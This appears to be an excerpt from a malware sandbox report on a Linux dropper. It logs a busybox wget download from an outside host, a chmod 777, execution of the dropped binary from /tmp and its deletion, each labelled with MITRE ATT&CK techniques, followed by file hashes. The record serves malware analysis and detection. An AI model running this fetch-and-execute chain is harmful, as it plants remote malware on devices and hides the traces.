/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:1037
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:1038
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:1039
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1040
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97